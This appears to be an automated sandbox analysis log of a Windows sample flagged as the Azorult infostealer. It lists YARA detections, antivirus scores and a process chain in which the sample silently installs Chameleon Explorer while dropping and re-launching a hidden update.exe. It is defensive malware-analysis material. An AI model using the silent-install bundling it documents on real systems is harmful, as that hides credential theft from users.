                    Source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                    Source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                    Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                    Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                    Source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                    Source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                    Source: ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmp, ChameleonExplorer.exe, 0000000F.00000002.2961914587.0000000006940000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .csproj
                    Source: classification engineClassification label: mal100.spyw.evad.winEXE@29/46@3/4
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_03566FD4 GetDiskFreeSpaceW,2_2_03566FD4
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004162B0 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,GetCurrentProcessId,21_2_004162B0
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_0040B224 CoCreateInstance,21_2_0040B224
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon ExplorerJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeFile created: C:\Users\user\AppData\Roaming\cexplorer.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeMutant created: NULL
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeMutant created: \Sessions\1\BaseNamedObjects\ChameleonFolderMiddleClick
                    Source: C:\Users\user\AppData\Roaming\update.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E-69414907-A8AD8678-F9A7748B-95432BB7A
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeFile created: C:\Users\user\AppData\Local\Temp\aut5826.tmpJump to behavior
                    Source: Yara matchFile source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmp, type: DROPPED
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                    Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                    Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeJump to behavior
                    Source: ETVk1yP43q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: ETVk1yP43q.exeReversingLabs: Detection: 68%
                    Source: ETVk1yP43q.exeVirustotal: Detection: 59%
                    Source: unknownProcess created: C:\Users\user\Desktop\ETVk1yP43q.exe "C:\Users\user\Desktop\ETVk1yP43q.exe"
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp" /SL5="$4040E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
                    Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 394276
                    Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                    Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                    Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-Jump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp" /SL5="$4040E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregisterJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /updateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /updateJump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 394276Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: winhttpcom.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: msftedit.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: windows.globalization.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpSection loaded: bcp47mrm.dllJump to behavior
